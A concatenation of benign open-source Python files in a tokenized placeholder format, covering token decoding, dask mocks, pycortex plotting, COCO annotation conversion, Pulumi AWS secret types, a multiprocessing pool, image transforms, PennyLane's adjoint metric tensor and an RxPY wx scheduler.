<block_start>log.error(f'{address} failed to decode as ERC20 token. Trying UNIV1 LP token. {str(e)}' )<line_sep>contract=EthereumContract(address=address abi=UNIV1_LP_ABI deployed_block=0)<line_sep>decoded=[contract.decode(x[1] method_name)[0]# pylint: disable=E1136
<if>x[0]<and>len(x[1])<else><none><for>(x method_name) zip(output properties)]<line_sep>log.debug(f'{address} was succesfuly decoded as ERC20 token')<block_end><for_stmt>prop,value zip(properties decoded)<block_start><if_stmt>isinstance(value bytes)<block_start>value=value.rstrip(b'\x00').decode()<block_end>info[prop]=value<block_end>self.contract_info_cache[address]=info<line_sep><return>info<block_end><block_end> |
<import_from_stmt>psutil virtual_memory<def_stmt>mock_cluster n_workers=1 threads_per_worker=1 diagnostics_port=8787 memory_limit=<none> **dask_kwarg<block_start><return>(n_workers threads_per_worker diagnostics_port memory_limit)<block_end><class_stmt>MockClient()<block_start><def_stmt>__init__ self cluster<block_start>self.cluster=cluster<block_end><def_stmt>scheduler_info self<block_start><return>{'workers':{'worker 1':{'memory_limit':virtual_memory().total}}}<block_end><block_end><def_stmt>get_mock_client_cluster <block_start><return>MockClient mock_cluster<block_end> |
<import_from_stmt>datetime datetime timezone<import_from_stmt>.enums StatisticTypeEnum<def_stmt>convert_timestamp_to_datetime timestamp:float<arrow>datetime<block_start>"""
Convert timestamp date format to datetime.
Arguments:
timestamp {float} -- Input timestamp.
Returns:
datetime -- Datetime formatted object which represents the
same information as timestamp.
"""<line_sep><return>datetime.fromtimestamp(timestamp timezone.utc)<block_end><def_stmt>get_enum_type statistic_type:str<arrow>StatisticTypeEnum<block_start>"""
Convert string object to enum.
Arguments:
statistic_type {str} -- Input string.
Returns:
StatisticTypeEnum -- Enum corresponding to statistic_type.
"""<line_sep><return>(StatisticTypeEnum.ALERT<if>statistic_type.lower()<eq>"alerts"<else>StatisticTypeEnum.REPORT)<block_end> |
"""
===================
Plot 2D Volume Data
===================
This plots example volume data onto an example subject, S1, onto a flatmap
using quickflat. In order for this to run, you have to have a flatmap for
this subject in the pycortex filestore.
The cortex.Volume2D object is instantiated with two numpy arrays of the same
size as the scan for this subject and transform. Here, there are two datasets
that have been generated to look like gradients across the brain, but you can
replace these with any numpy arrays of the correct dimensionality.
The colormap used in the first two flatmaps is
.. image:: ../../../filestore/colormaps/RdBu_covar.png
As with a 1D Volume, you can change vmin and vmax to threshold, but here
they can be manipulated individually for the two arrays.
You can also change the colormap when creating a new 2D volume. The colormap
used in the last flatmap is
.. image:: ../../../filestore/colormaps/GreenWhiteBlue_2D.png
"""<import_stmt>cortex<import_stmt>numpy<as>np<import_stmt>matplotlib.pyplot<as>plt<line_sep>subject="S1"<line_sep>xfm="fullhead"<line_sep># Creating two different test datasets that are both the same shape as this
# transform with one entry for each voxel
# The matrices have just been reordered in different ways so that they make
# gradients across the brain in different directions
test_data1=np.arange(31<times>100<times>100).reshape((31 100 100) order='C')<line_sep>test_data2=np.arange(31<times>100<times>100).reshape((31 100 100) order='F')<line_sep># This creates a 2D Volume object for both of our test datasets for the given
# subject and transform
vol_data=cortex.Volume2D(test_data1 test_data2 subject xfm)<line_sep>cortex.quickshow(vol_data with_colorbar=<false>)<line_sep>plt.show()<line_sep># You can alter the minimum and maximum values shown on the colorbar and this
# can be done separately for the two different datasets
vol_data=cortex.Volume2D(test_data1 test_data2 subject xfm vmin=np.mean(test_data1) vmax=np.max(test_data1) vmin2=np.min(test_data2) vmax2=np.mean(test_data2))<line_sep>cortex.quickshow(vol_data with_colorbar=<false>)<line_sep>plt.show()<line_sep># To change the colormap, you have to create a new Volume2D object
vol_color=cortex.Volume2D(test_data1 test_data2 subject xfm cmap="GreenWhiteBlue_2D")<line_sep>cortex.quickshow(vol_color with_colorbar=<false>)<line_sep>plt.show()<line_sep> |
# Copyright (c) OpenMMLab. All rights reserved.
<import_stmt>mmcv<def_stmt>convert_annotations image_infos out_json_name<block_start>"""Convert the annotation into coco style.
Args:
image_infos(list): The list of image information dicts
out_json_name(str): The output json filename
Returns:
out_json(dict): The coco style dict
"""<assert_stmt>isinstance(image_infos list)<assert_stmt>isinstance(out_json_name str)<assert_stmt>out_json_name<line_sep>out_json=dict()<line_sep>img_id=0<line_sep>ann_id=0<line_sep>out_json['images']=[]<line_sep>out_json['categories']=[]<line_sep>out_json['annotations']=[]<for_stmt>image_info image_infos<block_start>image_info['id']=img_id<line_sep>anno_infos=image_info.pop('anno_info')<line_sep>out_json['images'].append(image_info)<for_stmt>anno_info anno_infos<block_start>anno_info['image_id']=img_id<line_sep>anno_info['id']=ann_id<line_sep>out_json['annotations'].append(anno_info)<line_sep>ann_id<augadd>1<block_end>img_id<augadd>1<block_end>cat=dict(id=1 name='text')<line_sep>out_json['categories'].append(cat)<if_stmt>len(out_json['annotations'])<eq>0<block_start>out_json.pop('annotations')<block_end>mmcv.dump(out_json out_json_name)<line_sep><return>out_json<block_end> |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
<import_stmt>warnings<import_stmt>pulumi<import_stmt>pulumi.runtime<import_from_stmt>typing Any Mapping Optional Sequence Union overload<import_from_stmt>.. _utilities<line_sep>__all__=['SecretReplica' 'SecretRotationRotationRules' 'SecretRotationRules' 'GetSecretRotationRotationRuleResult' 'GetSecretRotationRuleResult' ]<line_sep>@pulumi.output_type<class_stmt>SecretReplica(dict)<block_start>@staticmethod<def_stmt>__key_warning key:str<block_start>suggest=<none><if_stmt>key<eq>"kmsKeyId"<block_start>suggest="kms_key_id"<block_end><elif_stmt>key<eq>"lastAccessedDate"<block_start>suggest="last_accessed_date"<block_end><elif_stmt>key<eq>"statusMessage"<block_start>suggest="status_message"<block_end><if_stmt>suggest<block_start>pulumi.log.warn(f"Key '{key}' not found in SecretReplica. Access the value via the '{suggest}' property getter instead.")<block_end><block_end><def_stmt>__getitem__ self key:str<arrow>Any<block_start>SecretReplica.__key_warning(key)<line_sep><return>super().__getitem__(key)<block_end><def_stmt>get self key:str default=<none><arrow>Any<block_start>SecretReplica.__key_warning(key)<line_sep><return>super().get(key default)<block_end><def_stmt>__init__ __self__ * region:str kms_key_id:Optional[str]=<none> last_accessed_date:Optional[str]=<none> status:Optional[str]=<none> status_message:Optional[str]=<none><block_start>"""
:param str region: Region for replicating the secret.
:param str kms_key_id: ARN, Key ID, or Alias.
:param str last_accessed_date: Date that you last accessed the secret in the Region.
:param str status: Status can be `InProgress`, `Failed`, or `InSync`.
:param str status_message: Message such as `Replication succeeded` or `Secret with this name already exists in this region`.
"""<line_sep>pulumi.set(__self__ "region" region)<if_stmt>kms_key_id<is><not><none><block_start>pulumi.set(__self__ "kms_key_id" kms_key_id)<block_end><if_stmt>last_accessed_date<is><not><none><block_start>pulumi.set(__self__ "last_accessed_date" last_accessed_date)<block_end><if_stmt>status<is><not><none><block_start>pulumi.set(__self__ "status" status)<block_end><if_stmt>status_message<is><not><none><block_start>pulumi.set(__self__ "status_message" status_message)<block_end><block_end>@property@pulumi.getter<def_stmt>region self<arrow>str<block_start>"""
Region for replicating the secret.
"""<line_sep><return>pulumi.get(self "region")<block_end>@property@pulumi.getter(name="kmsKeyId")<def_stmt>kms_key_id self<arrow>Optional[str]<block_start>"""
ARN, Key ID, or Alias.
"""<line_sep><return>pulumi.get(self "kms_key_id")<block_end>@property@pulumi.getter(name="lastAccessedDate")<def_stmt>last_accessed_date self<arrow>Optional[str]<block_start>"""
Date that you last accessed the secret in the Region.
"""<line_sep><return>pulumi.get(self "last_accessed_date")<block_end>@property@pulumi.getter<def_stmt>status self<arrow>Optional[str]<block_start>"""
Status can be `InProgress`, `Failed`, or `InSync`.
"""<line_sep><return>pulumi.get(self "status")<block_end>@property@pulumi.getter(name="statusMessage")<def_stmt>status_message self<arrow>Optional[str]<block_start>"""
Message such as `Replication succeeded` or `Secret with this name already exists in this region`.
"""<line_sep><return>pulumi.get(self "status_message")<block_end><block_end>@pulumi.output_type<class_stmt>SecretRotationRotationRules(dict)<block_start>@staticmethod<def_stmt>__key_warning key:str<block_start>suggest=<none><if_stmt>key<eq>"automaticallyAfterDays"<block_start>suggest="automatically_after_days"<block_end><if_stmt>suggest<block_start>pulumi.log.warn(f"Key '{key}' not found in SecretRotationRotationRules. Access the value via the '{suggest}' property getter instead.")<block_end><block_end><def_stmt>__getitem__ self key:str<arrow>Any<block_start>SecretRotationRotationRules.__key_warning(key)<line_sep><return>super().__getitem__(key)<block_end><def_stmt>get self key:str default=<none><arrow>Any<block_start>SecretRotationRotationRules.__key_warning(key)<line_sep><return>super().get(key default)<block_end><def_stmt>__init__ __self__ * automatically_after_days:int<block_start>"""
:param int automatically_after_days: Specifies the number of days between automatic scheduled rotations of the secret.
"""<line_sep>pulumi.set(__self__ "automatically_after_days" automatically_after_days)<block_end>@property@pulumi.getter(name="automaticallyAfterDays")<def_stmt>automatically_after_days self<arrow>int<block_start>"""
Specifies the number of days between automatic scheduled rotations of the secret.
"""<line_sep><return>pulumi.get(self "automatically_after_days")<block_end><block_end>@pulumi.output_type<class_stmt>SecretRotationRules(dict)<block_start>@staticmethod<def_stmt>__key_warning key:str<block_start>suggest=<none><if_stmt>key<eq>"automaticallyAfterDays"<block_start>suggest="automatically_after_days"<block_end><if_stmt>suggest<block_start>pulumi.log.warn(f"Key '{key}' not found in SecretRotationRules. Access the value via the '{suggest}' property getter instead.")<block_end><block_end><def_stmt>__getitem__ self key:str<arrow>Any<block_start>SecretRotationRules.__key_warning(key)<line_sep><return>super().__getitem__(key)<block_end><def_stmt>get self key:str default=<none><arrow>Any<block_start>SecretRotationRules.__key_warning(key)<line_sep><return>super().get(key default)<block_end><def_stmt>__init__ __self__ * automatically_after_days:int<block_start>"""
:param int automatically_after_days: Specifies the number of days between automatic scheduled rotations of the secret.
"""<line_sep>pulumi.set(__self__ "automatically_after_days" automatically_after_days)<block_end>@property@pulumi.getter(name="automaticallyAfterDays")<def_stmt>automatically_after_days self<arrow>int<block_start>"""
Specifies the number of days between automatic scheduled rotations of the secret.
"""<line_sep><return>pulumi.get(self "automatically_after_days")<block_end><block_end>@pulumi.output_type<class_stmt>GetSecretRotationRotationRuleResult(dict)<block_start><def_stmt>__init__ __self__ * automatically_after_days:int<block_start>pulumi.set(__self__ "automatically_after_days" automatically_after_days)<block_end>@property@pulumi.getter(name="automaticallyAfterDays")<def_stmt>automatically_after_days self<arrow>int<block_start><return>pulumi.get(self "automatically_after_days")<block_end><block_end>@pulumi.output_type<class_stmt>GetSecretRotationRuleResult(dict)<block_start><def_stmt>__init__ __self__ * automatically_after_days:int<block_start>pulumi.set(__self__ "automatically_after_days" automatically_after_days)<block_end>@property@pulumi.getter(name="automaticallyAfterDays")<def_stmt>automatically_after_days self<arrow>int<block_start><return>pulumi.get(self "automatically_after_days")<block_end><block_end> |
<import_from_stmt>braintree.exceptions.unexpected_error UnexpectedError<class_stmt>ConnectionError(UnexpectedError)<block_start><pass><block_end> |
# Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
<import_stmt>copy<import_stmt>multiprocessing<import_stmt>pickle<import_stmt>traceback<import_from_stmt>typ.host Host<def_stmt>make_pool host jobs callback context pre_fn post_fn<block_start>_validate_args(context pre_fn post_fn)<if_stmt>jobs<g>1<block_start><return>_ProcessPool(host jobs callback context pre_fn post_fn)<block_end><else_stmt><block_start><return>_AsyncPool(host jobs callback context pre_fn post_fn)<block_end><block_end><class_stmt>_MessageType(object)<block_start>Request='Request'<line_sep>Response='Response'<line_sep>Close='Close'<line_sep>Done='Done'<line_sep>Error='Error'<line_sep>Interrupt='Interrupt'<line_sep>values=[Request Response Close Done Error Interrupt]<block_end><def_stmt>_validate_args context pre_fn post_fn<block_start><try_stmt><block_start>_=pickle.dumps(context)<block_end><except_stmt>Exception<as>e<block_start><raise>ValueError('context passed to make_pool is not picklable: %s'%str(e))<block_end><try_stmt><block_start>_=pickle.dumps(pre_fn)<block_end><except_stmt>pickle.PickleError<block_start><raise>ValueError('pre_fn passed to make_pool is not picklable')<block_end><try_stmt><block_start>_=pickle.dumps(post_fn)<block_end><except_stmt>pickle.PickleError<block_start><raise>ValueError('post_fn passed to make_pool is not picklable')<block_end><block_end><class_stmt>_ProcessPool(object)<block_start><def_stmt>__init__ self host jobs callback context pre_fn post_fn<block_start>self.host=host<line_sep>self.jobs=jobs<line_sep>self.requests=multiprocessing.Queue()<line_sep>self.responses=multiprocessing.Queue()<line_sep>self.workers=[]<line_sep>self.discarded_responses=[]<line_sep>self.closed=<false><line_sep>self.erred=<false><for_stmt>worker_num range(1 jobs+1)<block_start>w=multiprocessing.Process(target=_loop args=(self.requests self.responses host.for_mp() worker_num callback context pre_fn post_fn))<line_sep>w.start()<line_sep>self.workers.append(w)<block_end><block_end><def_stmt>send self msg<block_start>self.requests.put((_MessageType.Request msg))<block_end><def_stmt>get self<block_start>msg_type,resp=self.responses.get()<if_stmt>msg_type<eq>_MessageType.Error<block_start>self._handle_error(resp)<block_end><elif_stmt>msg_type<eq>_MessageType.Interrupt<block_start><raise>KeyboardInterrupt<block_end><assert_stmt>msg_type<eq>_MessageType.Response<line_sep><return>resp<block_end><def_stmt>close self<block_start><for_stmt>_ self.workers<block_start>self.requests.put((_MessageType.Close <none>))<block_end>self.closed=<true><block_end><def_stmt>join self# TODO: one would think that we could close self.requests in close(),
# above, and close self.responses below, but if we do, we get
# weird tracebacks in the daemon threads multiprocessing starts up.
# Instead, we have to hack the innards of multiprocessing. It
# seems likely that there's a bug somewhere, either in this module or
# in multiprocessing.
# pylint: disable=protected-access
<block_start><if_stmt>self.host.is_python3# pragma: python3
<block_start>multiprocessing.queues.is_exiting=<lambda>:<true><block_end><else_stmt># pragma: python2
<block_start>multiprocessing.util._exiting=<true><block_end><if_stmt><not>self.closed# We must be aborting; terminate the workers rather than
# shutting down cleanly.
<block_start><for_stmt>w self.workers<block_start>w.terminate()<line_sep>w.join()<block_end><return>[]<block_end>final_responses=[]<line_sep>error=<none><line_sep>interrupted=<none><for_stmt>w self.workers<block_start><while_stmt><true><block_start>msg_type,resp=self.responses.get()<if_stmt>msg_type<eq>_MessageType.Error<block_start>error=resp<line_sep><break><block_end><if_stmt>msg_type<eq>_MessageType.Interrupt<block_start>interrupted=<true><line_sep><break><block_end><if_stmt>msg_type<eq>_MessageType.Done<block_start>final_responses.append(resp[1])<line_sep><break><block_end>self.discarded_responses.append(resp)<block_end><block_end><for_stmt>w self.workers<block_start>w.join()<block_end># TODO: See comment above at the beginning of the function for
# why this is commented out.
# self.responses.close()
<if_stmt>error<block_start>self._handle_error(error)<block_end><if_stmt>interrupted<block_start><raise>KeyboardInterrupt<block_end><return>final_responses<block_end><def_stmt>_handle_error self msg<block_start>worker_num,tb=msg<line_sep>self.erred=<true><line_sep><raise>Exception("Error from worker %d (traceback follows):\n%s"%(worker_num tb))<block_end><block_end># 'Too many arguments' pylint: disable=R0913
<def_stmt>_loop requests responses host worker_num callback context pre_fn post_fn should_loop=<true><block_start>host=host<or>Host()<try_stmt><block_start>context_after_pre=pre_fn(host worker_num context)<line_sep>keep_looping=<true><while_stmt>keep_looping<block_start>message_type,args=requests.get(block=<true>)<if_stmt>message_type<eq>_MessageType.Close<block_start>responses.put((_MessageType.Done (worker_num post_fn(context_after_pre))))<line_sep><break><block_end><assert_stmt>message_type<eq>_MessageType.Request<line_sep>resp=callback(context_after_pre args)<line_sep>responses.put((_MessageType.Response resp))<line_sep>keep_looping=should_loop<block_end><block_end><except_stmt>KeyboardInterrupt<as>e<block_start>responses.put((_MessageType.Interrupt (worker_num str(e))))<block_end><except_stmt>Exception<as>e<block_start>responses.put((_MessageType.Error (worker_num traceback.format_exc(e))))<block_end><block_end><class_stmt>_AsyncPool(object)<block_start><def_stmt>__init__ self host jobs callback context pre_fn post_fn<block_start>self.host=host<or>Host()<line_sep>self.jobs=jobs<line_sep>self.callback=callback<line_sep>self.context=copy.deepcopy(context)<line_sep>self.msgs=[]<line_sep>self.closed=<false><line_sep>self.post_fn=post_fn<line_sep>self.context_after_pre=pre_fn(self.host 1 self.context)<line_sep>self.final_context=<none><block_end><def_stmt>send self msg<block_start>self.msgs.append(msg)<block_end><def_stmt>get self<block_start><return>self.callback(self.context_after_pre self.msgs.pop(0))<block_end><def_stmt>close self<block_start>self.closed=<true><line_sep>self.final_context=self.post_fn(self.context_after_pre)<block_end><def_stmt>join self<block_start><if_stmt><not>self.closed<block_start>self.close()<block_end><return>[self.final_context]<block_end><block_end> |
# Copyright 2020 The TensorFlow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Image functions."""<line_sep># python3
<import_from_stmt>cvx2 latest<as>cv2<import_stmt>numpy<as>np<def_stmt>get_affine_transform center scale rot output_size inverse=<false><block_start>"""Affine transform."""<if_stmt><not>isinstance(scale (np.ndarray list))<block_start>scale=np.array([scale scale] dtype=np.float32)<block_end>dst_w,dst_h=output_size[0] output_size[1]<line_sep>rot_rad=np.pi<times>rot/180<line_sep>src_dir=get_dir([0 scale[0]<times>-0.5] rot_rad)<line_sep>dst_dir=np.array([0 dst_w<times>-0.5] np.float32)<line_sep>src=np.zeros((3 2) dtype=np.float32)<line_sep>dst=np.zeros((3 2) dtype=np.float32)<line_sep>src[0 :],src[1 :]=center center+src_dir<line_sep>dst[0 :]=[dst_w<times>0.5 dst_h<times>0.5]<line_sep>dst[1 :]=np.array([dst_w<times>0.5 dst_h<times>0.5] np.float32)+dst_dir<line_sep>src[2: :]=get_3rd_point(src[0 :] src[1 :])<line_sep>dst[2: :]=get_3rd_point(dst[0 :] dst[1 :])<if_stmt>inverse<block_start>transform=cv2.getAffineTransform(np.float32(dst) np.float32(src))<block_end><else_stmt><block_start>transform=cv2.getAffineTransform(np.float32(src) np.float32(dst))<block_end><return>transform<block_end><def_stmt>get_3rd_point point_1 point_2<block_start>tmp_point=point_1-point_2<line_sep><return>point_2+np.array([-tmp_point[1] tmp_point[0]] dtype=np.float32)<block_end><def_stmt>get_dir point rot_rad<block_start>sin_rot,cos_rot=np.sin(rot_rad) np.cos(rot_rad)<line_sep>result=[0 0]<line_sep>result[0]=point[0]<times>cos_rot-point[1]<times>sin_rot<line_sep>result[1]=point[0]<times>sin_rot+point[1]<times>cos_rot<line_sep><return>np.array(result)<block_end><def_stmt>transform_points points center scale output_size inverse=<false><block_start>transform=get_affine_transform(center scale 0 output_size inverse=inverse)<line_sep>new_points=np.concatenate([points np.ones([points.shape[0] 1])] axis=1)<line_sep>points_transformed=np.dot(transform new_points.T).T<line_sep><return>points_transformed<block_end><def_stmt>transform_predictions points center scale output_size<block_start><return>transform_points(points center scale output_size inverse=<true>)<block_end> |
# Copyright 2018-2021 Xanadu Quantum Technologies Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Contains the adjoint_metric_tensor.
"""<import_stmt>warnings<import_from_stmt>itertools chain<import_from_stmt>pennylane numpy<as>np<import_stmt>pennylane<as>qml<line_sep># pylint: disable=protected-access
<import_from_stmt>pennylane.transforms.metric_tensor _contract_metric_tensor_with_cjac<def_stmt>_apply_operations state op device invert=<false><block_start>"""Wrapper that allows to apply a variety of operations---or groups
of operations---to a state or to prepare a new state.
If ``invert=True``, this function makes sure not to alter the operations.
The state of the device, however may be altered, depending on the
device and performed operation(s).
"""<line_sep># pylint: disable=protected-access
<if_stmt>isinstance(op (list np.ndarray))<block_start><if_stmt>invert<block_start>op=op[::-1]<block_end><for_stmt>_op op<block_start>state=_apply_operations(state _op device invert)<block_end><return>state<block_end><if_stmt>isinstance(op qml.QubitStateVector)<block_start><if_stmt>invert<block_start><raise>ValueError("Can't invert state preparation.")<block_end>device._apply_state_vector(op.parameters[0] op.wires)<line_sep><return>device._state<block_end><if_stmt>isinstance(op qml.BasisState)<block_start><if_stmt>invert<block_start><raise>ValueError("Can't invert state preparation.")<block_end>device._apply_basis_state(op.parameters[0] op.wires)<line_sep><return>device._state<block_end><if_stmt>invert<block_start>op.inv()<block_end>state=device._apply_operation(state op)<if_stmt>invert<block_start>op.inv()<block_end><return>state<block_end><def_stmt>_group_operations tape<block_start>"""Divide all operations of a tape into trainable operations and blocks
of untrainable operations after each trainable one."""<line_sep># Extract tape operations list
ops=tape.operations<line_sep># Find the indices of trainable operations in the tape operations list
trainables=np.where([qml.operation.is_trainable(op)<for>op ops])[0]<line_sep># Add the indices incremented by one to the trainable indices
split_ids=list(chain.from_iterable([idx idx+1]<for>idx trainables))<line_sep># Split at trainable and incremented indices to get groups after trainable
# operations and single trainable operations (in alternating order)
all_groups=np.split(ops split_ids)<line_sep># Collect trainable operations and groups after trainable operations
# the first set of non-trainable ops are the ops "after the -1st" trainable op
group_after_trainable_op=dict(enumerate(all_groups[::2] start=-1))<line_sep>trainable_operations=list(chain.from_iterable(all_groups[1::2]))<line_sep><return>trainable_operations group_after_trainable_op<block_end><def_stmt>adjoint_metric_tensor circuit device=<none> hybrid=<true><block_start>r"""Implements the adjoint method outlined in
`Jones <https://arxiv.org/abs/2011.02991>`__ to compute the metric tensor.
A forward pass followed by intermediate partial backwards passes are
used to evaluate the metric tensor in :math:`\mathcal{O}(p^2)` operations,
where :math:`p` is the number of trainable operations, using 4 state
vectors.
.. note::
The adjoint metric tensor method has the following restrictions:
* Currently only ``"default.qubit"`` with ``shots=None`` is supported.
* We assume the circuit to be composed of unitary gates only and rely
on the ``generator`` property of the gates to be implemented.
Note also that this makes the metric tensor strictly real-valued.
Args:
circuit (.QuantumTape or .QNode): Circuit to compute the metric tensor of
device (.Device): Device to use for the adjoint method
hybrid (bool): Whether to take classical preprocessing into account. Ignored if
``circuit`` is a tape.
Returns:
array: the metric tensor of the tape with respect to its trainable parameters.
Dimensions are ``(tape.num_params, tape.num_params)``.
.. seealso:: :func:`~.metric_tensor` for hardware-compatible metric tensor computations.
**Example**
Consider the following QNode:
.. code-block:: python
dev = qml.device("default.qubit", wires=3)
@qml.qnode(dev, interface="autograd")
def circuit(weights):
qml.RX(weights[0], wires=0)
qml.RY(weights[1], wires=0)
qml.CNOT(wires=[0, 1])
qml.RZ(weights[2], wires=1)
qml.RZ(weights[3], wires=0)
return qml.expval(qml.PauliZ(0) @ qml.PauliZ(1)), qml.expval(qml.PauliY(1))
We can use the ``adjoint_metric_tensor`` transform to generate a new function
that returns the metric tensor of this QNode:
>>> mt_fn = qml.adjoint_metric_tensor(circuit)
>>> weights = np.array([0.1, 0.2, 0.4, 0.5], requires_grad=True)
>>> mt_fn(weights)
tensor([[ 0.25 , 0. , -0.0497, -0.0497],
[ 0. , 0.2475, 0.0243, 0.0243],
[-0.0497, 0.0243, 0.0123, 0.0123],
[-0.0497, 0.0243, 0.0123, 0.0123]], requires_grad=True)
This approach has the benefit of being significantly faster than the hardware-ready
``metric_tensor`` function:
>>> import time
>>> start_time = time.process_time()
>>> mt = mt_fn(weights)
>>> time.process_time() - start_time
0.019
>>> mt_fn_2 = qml.metric_tensor(circuit)
>>> start_time = time.process_time()
>>> mt = mt_fn_2(weights)
>>> time.process_time() - start_time
0.025
This speedup becomes more drastic for larger circuits.
The drawback of the adjoint method is that it is only available on simulators and without
shot simulations.
"""<if_stmt>isinstance(circuit qml.tape.QuantumTape)<block_start><return>_adjoint_metric_tensor_tape(circuit device)<block_end><if_stmt>isinstance(circuit (qml.QNode qml.ExpvalCost))<block_start><return>_adjoint_metric_tensor_qnode(circuit device hybrid)<block_end><raise>qml.QuantumFunctionError("The passed object is not a QuantumTape or QNode.")<block_end><def_stmt>_adjoint_metric_tensor_tape tape device<block_start>"""Computes the metric tensor of a tape using the adjoint method and a given device."""<line_sep># pylint: disable=protected-access
<if_stmt>device.shots<is><not><none><block_start><raise>ValueError("The adjoint method for the metric tensor is only implemented for shots=None")<block_end>tape=qml.transforms.expand_trainable_multipar(tape)<line_sep># Divide all operations of a tape into trainable operations and blocks
# of untrainable operations after each trainable one.
trainable_operations,group_after_trainable_op=_group_operations(tape)<line_sep>dim=2<power>device.num_wires<line_sep># generate and extract initial state
psi=device._create_basis_state(0)<line_sep># initialize metric tensor components (which all will be real-valued)
like_real=qml.math.real(psi[0])<line_sep>L=qml.math.convert_like(qml.math.zeros((tape.num_params tape.num_params)) like_real)<line_sep>T=qml.math.convert_like(qml.math.zeros((tape.num_params )) like_real)<line_sep>psi=_apply_operations(psi group_after_trainable_op[-1] device)<for_stmt>j,outer_op enumerate(trainable_operations)<block_start>generator_1,prefactor_1=qml.generator(outer_op)<line_sep>generator_1=qml.matrix(generator_1)<line_sep># the state vector phi is missing a factor of 1j * prefactor_1
phi=device._apply_unitary(psi qml.math.convert_like(generator_1 like_real) outer_op.wires)<line_sep>phi_real=qml.math.reshape(qml.math.real(phi) (dim ))<line_sep>phi_imag=qml.math.reshape(qml.math.imag(phi) (dim ))<line_sep>diag_value=prefactor_1<power>2<times>(qml.math.dot(phi_real phi_real)+qml.math.dot(phi_imag phi_imag))<line_sep>L=qml.math.scatter_element_add(L (j j) diag_value)<line_sep>lam=psi<times>1.0<line_sep>lam_real=qml.math.reshape(qml.math.real(lam) (dim ))<line_sep>lam_imag=qml.math.reshape(qml.math.imag(lam) (dim ))<line_sep># this entry is missing a factor of 1j
value=prefactor_1<times>(qml.math.dot(lam_real phi_real)+qml.math.dot(lam_imag phi_imag))<line_sep>T=qml.math.scatter_element_add(T (j ) value)<for_stmt>i range(j-1 -1 -1)# after first iteration of inner loop: apply U_{i+1}^\dagger
<block_start><if_stmt>i<l>j-1<block_start>phi=_apply_operations(phi trainable_operations[i+1] device invert=<true>)<block_end># apply V_{i}^\dagger
phi=_apply_operations(phi group_after_trainable_op[i] device invert=<true>)<line_sep>lam=_apply_operations(lam group_after_trainable_op[i] device invert=<true>)<line_sep>inner_op=trainable_operations[i]<line_sep># extract and apply G_i
generator_2,prefactor_2=qml.generator(inner_op)<line_sep>generator_2=qml.matrix(generator_2)<line_sep># this state vector is missing a factor of 1j * prefactor_2
mu=device._apply_unitary(lam qml.math.convert_like(generator_2 lam) inner_op.wires)<line_sep>phi_real=qml.math.reshape(qml.math.real(phi) (dim ))<line_sep>phi_imag=qml.math.reshape(qml.math.imag(phi) (dim ))<line_sep>mu_real=qml.math.reshape(qml.math.real(mu) (dim ))<line_sep>mu_imag=qml.math.reshape(qml.math.imag(mu) (dim ))<line_sep># this entry is missing a factor of 1j * (-1j) = 1, i.e. none
value=(prefactor_1<times>prefactor_2<times>(qml.math.dot(mu_real phi_real)+qml.math.dot(mu_imag phi_imag)))<line_sep>L=qml.math.scatter_element_add(L [(i j) (j i)] value<times>qml.math.convert_like(qml.math.ones((2 )) value))<line_sep># apply U_i^\dagger
lam=_apply_operations(lam inner_op device invert=<true>)<block_end># apply U_j and V_j
psi=_apply_operations(psi [outer_op *group_after_trainable_op[j]] device)<block_end># postprocessing: combine L and T into the metric tensor.
# We require outer(conj(T), T) here, but as we skipped the factor 1j above,
# the stored T is real-valued. Thus we have -1j*1j*outer(T, T) = outer(T, T)
metric_tensor=L-qml.math.tensordot(T T 0)<line_sep><return>metric_tensor<block_end><def_stmt>_adjoint_metric_tensor_qnode qnode device hybrid<block_start>"""Computes the metric tensor of a qnode using the adjoint method and its device.
For ``hybrid==True`` this wrapper accounts for classical preprocessing within the
QNode.
"""<if_stmt>device<is><none><block_start><if_stmt>isinstance(qnode qml.ExpvalCost)<block_start><if_stmt>qnode._multiple_devices# pylint: disable=protected-access
<block_start>warnings.warn("ExpvalCost was instantiated with multiple devices. Only the first device "<concat>"will be used to evaluate the metric tensor with the adjoint method." UserWarning )<block_end>qnode=qnode.qnodes.qnodes[0]<block_end>device=qnode.device<block_end>cjac_fn=qml.transforms.classical_jacobian(qnode expand_fn=qml.transforms.expand_trainable_multipar)<def_stmt>wrapper *args **kwargs<block_start>qnode.construct(args kwargs)<line_sep>mt=_adjoint_metric_tensor_tape(qnode.qtape device)<if_stmt><not>hybrid<block_start><return>mt<block_end>cjac=cjac_fn(*args **kwargs)<line_sep><return>_contract_metric_tensor_with_cjac(mt cjac)<block_end><return>wrapper<block_end> |
<import_stmt>logging<import_from_stmt>rx.core Disposable<import_from_stmt>rx.disposables SingleAssignmentDisposable CompositeDisposable<import_from_stmt>rx.concurrency.schedulerbase SchedulerBase<line_sep>log=logging.getLogger("Rx")<class_stmt>WxScheduler(SchedulerBase)<block_start>"""A scheduler for a wxPython event loop."""<def_stmt>__init__ self wx<block_start>self.wx=wx<line_sep>self._timers=set()<class_stmt>Timer(wx.Timer)<block_start><def_stmt>__init__ self callback<block_start>super(Timer self).__init__()<line_sep>self.callback=callback<block_end><def_stmt>Notify self<block_start>self.callback()<block_end><block_end>self._timer_class=Timer<block_end><def_stmt>cancel_all self<block_start>"""Cancel all scheduled actions.
